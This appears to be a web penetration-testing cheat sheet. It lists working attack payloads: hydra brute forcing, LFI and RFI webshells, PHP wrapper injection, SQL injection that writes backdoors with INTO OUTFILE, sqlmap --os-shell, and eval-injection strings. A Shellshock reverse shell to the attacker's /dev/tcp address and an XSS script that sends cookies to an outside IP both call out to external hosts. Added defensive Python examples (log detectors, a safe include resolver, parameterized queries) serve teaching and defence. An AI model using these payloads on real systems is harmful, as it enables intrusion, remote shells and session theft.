
Exploitation

Credentials

Create password dictionary for brute force

cewl -m 5 http://$ip/joomla/ > passwd.txt

Default Credentials

ls /usr/share/seclists/Passwords/Default-Credentials

Crack hash

john hash --wordlist=/home/kali/tools/directory/rockyou.txt

Brute force

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 192.168.169.106 http-post-form '/login:user=^USER^&pass=^PASS^:Unauthorized'
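The detection-side counterpart to the hydra run above, as an added example (not from the original cheat sheet): a sliding-window counter over web-server access logs that flags any source address producing a burst of failed POSTs to the login path. The log lines are constructed in Apache/nginx combined format, and the threshold, window and status code are this example's assumptions.

```python
"""Detect password brute forcing against a login form from access logs.

Added example (not from the original cheat sheet). Assumes combined-log-format
lines; the sample lines below are constructed, not captured traffic.
"""
from collections import defaultdict, deque
from datetime import datetime
import re

# Constructed sample: one client hammering /login with 401s, one normal user.
SAMPLE_LOG = """\
192.168.169.50 - - [10/Oct/2023:13:55:36 +0000] "POST /login HTTP/1.1" 401 12
192.168.169.50 - - [10/Oct/2023:13:55:36 +0000] "POST /login HTTP/1.1" 401 12
192.168.169.50 - - [10/Oct/2023:13:55:37 +0000] "POST /login HTTP/1.1" 401 12
192.168.169.50 - - [10/Oct/2023:13:55:37 +0000] "POST /login HTTP/1.1" 401 12
192.168.169.50 - - [10/Oct/2023:13:55:38 +0000] "POST /login HTTP/1.1" 401 12
192.168.169.50 - - [10/Oct/2023:13:55:38 +0000] "POST /login HTTP/1.1" 401 12
192.168.169.50 - - [10/Oct/2023:13:55:39 +0000] "POST /login HTTP/1.1" 200 512
10.0.0.7 - - [10/Oct/2023:13:55:40 +0000] "POST /login HTTP/1.1" 401 12
10.0.0.7 - - [10/Oct/2023:13:56:10 +0000] "POST /login HTTP/1.1" 200 512
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Pull source IP, timestamp, method, path and status out of one log line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FMT),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def find_bruteforce(log_text, login_path="/login", threshold=5, window_s=60):
    """Return {ip: peak_failures} for every source whose failed logins
    (HTTP 401) to login_path reach `threshold` inside any `window_s` seconds."""
    windows = defaultdict(deque)   # per-IP timestamps of recent failures
    flagged = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec["method"] != "POST" or rec["path"] != login_path:
            continue
        if rec["status"] != 401:
            continue
        q = windows[rec["ip"]]
        q.append(rec["ts"])
        # drop failures that fell out of the sliding window
        while (q[-1] - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold:
            flagged[rec["ip"]] = max(flagged.get(rec["ip"], 0), len(q))
    return flagged
```

The final 200 from the flagged address is the case worth alerting on: a burst of failures followed by a success is the signature of a wordlist run that found a valid pair.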

Directory Traversal

Unix

/etc/passwd

Windows

c:\windows\system32\drivers\etc\hosts

PHP Wrappers

Inject PHP code via plain text

http://ip/file.php?file=data:text/plain,<?php echo shell_exec("dir") ?>

Inject PHP code via base64

http://ip/file.php?file=data:;base64,PD9zeXN0ZW0oJF9HRVRbJ3gnXSk7Pz4=&x=dir

Base64-encode the file before reading it (source is returned instead of executed).

http://ip/file.php?file=php://filter/read=convert.base64-encode/resource=/etc/passwd

File Inclusion

Local File Inclusion

Null byte: %00

Write payload to access.log file

$ nc -nv 192.168.11.131 80
(UNKNOWN) [192.168.11.131] 80 (http) open
<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>

Get RCE via file inclusion

curl "http://192.168.11.131/file.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig"

Remote File Inclusion

<?php echo shell_exec($_GET['cmd']); ?>
curl "http://target/?page=http://$ip/backdoor.txt&cmd=id"
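What an include handler has to do to shut the Directory Traversal, PHP Wrappers and File Inclusion sections above, as an added example (not from the original cheat sheet): decode once, reject null bytes and any scheme prefix, refuse absolute paths, canonicalize under a fixed base directory and check the prefix including the separator. The base directory, file names and allowed extensions are constructed for the demonstration.

```python
"""Resolve a user-supplied "file" parameter the way an include handler should:
inside a fixed base directory, no stream wrappers, no traversal, no null bytes.

Added example (not from the original cheat sheet); the base directory, file
names and extension allowlist are constructed for the demonstration.
"""
import os
import tempfile
from urllib.parse import unquote

# A scheme prefix (php://filter, data:, http://) selects a wrapper, not a file.
WRAPPER_PREFIXES = ("php://", "data:", "file://", "http://", "https://",
                    "ftp://", "expect://", "phar://")
ALLOWED_EXT = {".php", ".html", ".txt"}


class IncludeRejected(ValueError):
    pass


def resolve_include(base_dir, user_value):
    """Return an absolute path under base_dir, or raise IncludeRejected."""
    value = unquote(user_value)          # decode %00, %2e%2e and friends first
    if "\x00" in value:
        raise IncludeRejected("null byte")
    if value.lower().startswith(WRAPPER_PREFIXES) or "://" in value:
        raise IncludeRejected("stream wrapper / URL")
    if os.path.isabs(value) or value.startswith("\\") or (len(value) > 1 and value[1] == ":"):
        raise IncludeRejected("absolute path")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, value))
    # Prefix check must include the separator: /var/www-evil must not pass for /var/www.
    if candidate != base and not candidate.startswith(base + os.sep):
        raise IncludeRejected("escapes base directory")
    if os.path.splitext(candidate)[1] not in ALLOWED_EXT:
        raise IncludeRejected("extension not allowed")
    if not os.path.isfile(candidate):
        raise IncludeRejected("no such file")
    return candidate


def demo():
    """Run the resolver over the payload shapes from this page; returns
    {input: "ok" | rejection reason}."""
    with tempfile.TemporaryDirectory() as base:
        open(os.path.join(base, "about.php"), "w").close()   # the one legitimate target
        results = {}
        for v in ["about.php",
                  "../../../../etc/passwd",
                  "..%2f..%2fetc%2fpasswd",
                  "about.php%00.jpg",
                  "php://filter/read=convert.base64-encode/resource=/etc/passwd",
                  "data:text/plain,<?php echo 1 ?>",
                  "http://203.0.113.5/backdoor.txt",
                  "c:\\xampp\\apache\\logs\\access.log"]:
            try:
                resolve_include(base, v)
                results[v] = "ok"
            except IncludeRejected as e:
                results[v] = str(e)
        return results
```

The realpath step is what defeats traversal regardless of how many `../` are stacked; the prefix check is only meaningful after it, and only with the trailing separator.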

SQL Injection

Authentication Bypass

admin' or 1=1 LIMIT 1;#
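The login check this payload defeats, next to the parameterized version that it does not, as an added example (not from the original cheat sheet). It runs against an in-memory SQLite database with constructed rows; because SQLite's comment token is `--`, the trailing `#` of the page's MySQL payload is swapped for `-- ` and the `' or 1=1 LIMIT 1` part is kept as-is.

```python
"""Login check built by string concatenation next to the parameterized one.

Added example, not from the original cheat sheet. Uses an in-memory SQLite
database with constructed rows so it runs offline. SQLite's comment token is
`--`, so the page's MySQL payload is adapted by replacing the trailing `#`
with `-- `; the `' or 1=1 LIMIT 1` part is unchanged.
"""
import sqlite3

BYPASS = "admin' or 1=1 LIMIT 1 -- "


def setup_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # Plaintext passwords only to keep the demo short; real code stores a hash.
    con.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                    [("admin", "correct-horse"), ("bob", "hunter2")])
    return con


def login_unsafe(con, username, password):
    """Vulnerable: the parameter text becomes part of the SQL grammar, so the
    quote closes the literal, `or 1=1` rewrites the WHERE clause and the
    comment discards the password check."""
    sql = ("SELECT username FROM users WHERE username='%s' AND password='%s'"
           % (username, password))
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(con, username, password):
    """Fixed: placeholders keep the values out of the grammar; the quote is
    just a character inside a string that matches no username."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    row = con.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def demo():
    con = setup_db()
    return {
        "unsafe_bypass": login_unsafe(con, BYPASS, "wrong"),      # "admin", no password needed
        "safe_bypass": login_safe(con, BYPASS, "wrong"),          # None
        "safe_legit": login_safe(con, "admin", "correct-horse"),  # "admin"
    }
```

The same placeholder rule is what blocks the UNION enumeration and `load_file`/`INTO OUTFILE` strings further down: the driver sends the value separately from the statement text, so no part of it is parsed as SQL.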

Enumerating the Database

order by 3
union all select 1, 2, 3
union all select 1, @@version, 3
union all select 1, table_name, 3 from information_schema.tables
union all select 1, column_name, 3 from information_schema.columns where table_name='users'
union all select 1, username, password from users

SQLi to Code Execution

Read file

union all select 1, load_file('C:/Windows/System32/drivers/etc/hosts'), 3

Write backdoor

union all select 1, "<?php echo shell_exec($_GET['cmd']);?>", 3 into OUTFILE 'c:/xampp/htdocs/backdoor.php'
priority=Normal' UNION SELECT ('<?php echo exec($_GET["c"]);') INTO OUTFILE '/srv/http/c.php'; -- -

Automating SQL Injection

sqlmap

Technique letters for --technique:

  1. B: Boolean-based blind
  2. E: Error-based
  3. U: Union query-based
  4. S: Stacked queries
  5. T: Time-based blind
  6. Q: Inline queries

sqlmap -u http://$ip/debug.php?id=1 -p "id"

Dump databases

sqlmap -u http://$ip/debug.php?id=1 -p "id" --dbms=mysql --dump

Execute a shell

sqlmap -u http://$ip/debug.php?id=1 -p "id" --dbms=mysql --os-shell

From a saved request file (POST)

sqlmap -r req --dbms mysql -p limit --level 3 --batch --technique=S --os-shell

Shellshock POC

curl -H "user-agent: () { :; }; echo; /bin/bash -c 'bash -i >& /dev/tcp/$myip/445 0>&1'" http://$ip/cgi-bin/user.sh

Command Execution

;id
`id`
$(id)
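The defensive counterpart to these metacharacters, as an added example (not from the original cheat sheet): a constructed "ping a host" handler that allowlist-validates the parameter and hands an argv list to subprocess with no shell, so `;id`, backticks and `$(id)` are never interpreted. The hostname grammar and the ping argv are this example's assumptions.

```python
"""Run an external program on a request parameter without a shell, so `;id`,
`id` in backticks and `$(id)` are inert text rather than commands.

Added example, not from the original cheat sheet. The "ping a host" handler,
hostname allowlist and argv are constructed for the demonstration.
"""
import re
import subprocess

# RFC 1123-style hostname (dotted IPv4 also passes): labels of alphanumerics
# and hyphens, no leading/trailing hyphen, 253 characters in total at most.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)
# Characters a POSIX shell would interpret; reported for logging, never used
# as the only line of defence (the allowlist above is).
SHELL_META = set(";|&`$(){}<>\n'\"\\")


def shell_metachars(value):
    """Sorted list of shell metacharacters present in value."""
    return sorted(c for c in set(value) if c in SHELL_META)


def build_ping_argv(host):
    """Allowlist-validate host and return the argv list for ping.
    Raises ValueError for anything outside the hostname grammar."""
    if not HOSTNAME_RE.match(host):
        raise ValueError("rejected host %r (shell metacharacters: %s)"
                         % (host, shell_metachars(host)))
    return ["ping", "-c", "1", host]


def is_rejected(host):
    """True if build_ping_argv refuses the value."""
    try:
        build_ping_argv(host)
    except ValueError:
        return True
    return False


def run_ping(host, timeout=5):
    """shell=False (the default) hands argv straight to execve: there is no
    shell to expand `;`, backticks or $(...), whatever the argument contains."""
    return subprocess.run(build_ping_argv(host), capture_output=True,
                          text=True, timeout=timeout)
```

Two layers are deliberate: the argv list removes the shell, which is the interpreter these payloads need, and the allowlist removes the remaining risk of the program itself treating a leading `-` or odd character as an option.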

Code Execution

Ruby

eval "\""+params['1']+"\""

?1="%2b`id`%2b"

Python

eval('"' + params['1'] + '"')   # params['1'] is the request parameter

"%2bos.system('id')%2b"

"%2bos.popen('id').read()%2b"

"%2b__import__('os').popen('id').read()%2b"

"%2b__import__('os').popen(__import__('base64').b64decode('aWQ=')).read()%2b"

Perl

eval("return '".$FORM{1}."'");

/cgi-bin/form?1='.`id`.'

PHP

eval()

$s="echo \"".$_GET['1']."\";";

eval($s);

?1=".system('id')."

usort()

$field = $_GET["1"];

// create_function() compiles its body from a string, so $field is parsed as PHP
usort($rows, create_function('$a, $b', 'return strcmp($a->'.$field.',$b->'.$field.');'));

?1=id);}system('id');//

preg_replace()

preg_replace($_GET["1"], $_GET["2"], $_GET["3"]);

?1=/x/e&2=system('id')&3=x

assert()

assert(trim("'".$_GET['1']."'"));

echo htmlentities($_GET['1']);

?1=hacker'.system('id').'

site.master to RCE

<%@ Language="C#" src="site.master.cs" Inherits="MyNamespaceMaster.MyClassMaster" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
    <head runat="server">
        <title>Butch</title>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
        <meta name="application-name" content="Butch">
        <meta name="author" content="Butch">
        <meta name="description" content="Butch">
        <meta name="keywords" content="Butch">
        <link media="all" href="style.css" rel="stylesheet" type="text/css" />
        <link id="favicon" rel="shortcut icon" type="image/png" href="favicon.png" />
    </head>
    <body>
        <div id="wrap">
            <div id="header">Welcome to Butch Repository</div>
            <div id="main">
                <div id="content">
                    <br />
                    <asp:contentplaceholder id="ContentPlaceHolder1" runat="server"></asp:contentplaceholder>
                    <br />
                </div>
            </div>
        </div>
<%
// Render block: runs server-side every time the master page is rendered
string stdout = "";
string cmd = "whoami";
System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("cmd", "/c " + cmd);
procStartInfo.RedirectStandardOutput = true;   // capture the command's stdout
procStartInfo.UseShellExecute = false;         // required for redirection
procStartInfo.CreateNoWindow = true;
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo = procStartInfo;
p.Start();
stdout = p.StandardOutput.ReadToEnd();
Response.Write(stdout);                        // write the output into the page
%>
    </body>
</html>

Rendered output:

nt authority\system

XSS Basic Exploit

Characters that break out of the surrounding markup or script

< > ' " { } ;

Content Injection

<iframe src=http://ip/report height="0" width="0"></iframe>

Stealing Cookies and Session Information

<script>new Image().src="http://10.11.0.4/cool.jpg?output="+document.cookie;</script>
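A signature scan that recognises the request shapes collected on this page (traversal, PHP wrappers, UNION and file-write SQLi, the Shellshock header, command substitution, the `+`-concatenation breakouts into eval(), preg_replace /e and reflected XSS), run over constructed log lines, as an added example (not from the original cheat sheet). The lines use a simplified "ip request-text" format, decoding is repeated to catch double encoding, and the rule names are this example's own.

```python
"""Flag requests carrying the payload shapes collected on this page.

Added example, not from the original cheat sheet. Log lines are constructed in
a simplified "ip request-text" format (path plus, where relevant, a header
value), not captured traffic. Rule names are this example's own.
"""
import re
from urllib.parse import unquote

RULES = [
    ("path_traversal",   re.compile(r"(\.\./|\.\.\\){2,}")),
    ("php_wrapper",      re.compile(r"\b(php|data|expect|phar)://|[?&=]data:", re.I)),
    ("null_byte",        re.compile(r"%00|\x00")),
    ("sqli_union",       re.compile(r"\bunion\s+(all\s+)?select\b|\border\s+by\s+\d+", re.I)),
    ("sqli_file",        re.compile(r"\bload_file\s*\(|\binto\s+(out|dump)file\b", re.I)),
    ("sqli_auth_bypass", re.compile(r"'\s*or\s+\d+\s*=\s*\d+", re.I)),
    ("shellshock",       re.compile(r"\(\)\s*\{\s*:;\s*\};")),
    ("cmd_substitution", re.compile(r"`[^`]+`|\$\([^)]+\)|;\s*(id|whoami|uname)\b")),
    # The %2b payloads decode to `"+__import__...` / `"+os.system(...)`.
    ("eval_concat",      re.compile(r'"\s*\+\s*(__import__|os\.|system\(|popen\()')),
    ("preg_replace_e",   re.compile(r"=/[^/&]*/e(&|$)")),
    ("xss",              re.compile(r"<\s*(script|iframe|img)\b", re.I)),
]

# Constructed sample; first line is benign, the rest reuse payloads from this page.
SAMPLE = """\
10.0.0.9 /index.php?page=about
192.0.2.10 /file.php?file=../../../../etc/passwd
192.0.2.10 /file.php?file=php://filter/read=convert.base64-encode/resource=/etc/passwd
192.0.2.11 /debug.php?id=1%20union%20all%20select%201,@@version,3
192.0.2.12 /cgi-bin/user.sh ()%20{%20:;%20};%20echo;%20/bin/bash%20-c%20'id'
192.0.2.13 /ping?host=127.0.0.1;id
192.0.2.14 /calc?1=%22%2b__import__('os').popen('id').read()%2b%22
192.0.2.15 /x.php?1=/x/e&2=system('id')&3=x
192.0.2.16 /search?q=<script>new%20Image().src='http://203.0.113.5/c?'%2bdocument.cookie</script>
"""


def normalize(s, rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded payloads are seen
    in the same form the application will eventually see them."""
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


def scan_request(line):
    """Return (ip, [matching rule names]) for one log line."""
    ip, _, request = line.partition(" ")
    decoded = normalize(request)
    return ip, [name for name, rx in RULES if rx.search(decoded)]


def scan_log(text):
    """Return [(ip, [rule names])] for every line that hits at least one rule."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ip, rules = scan_request(line)
        if rules:
            hits.append((ip, rules))
    return hits
```

Decoding before matching matters more than the individual patterns: the hydra, sqlmap and eval payloads on this page all arrive percent-encoded, and a rule applied to the raw line misses them.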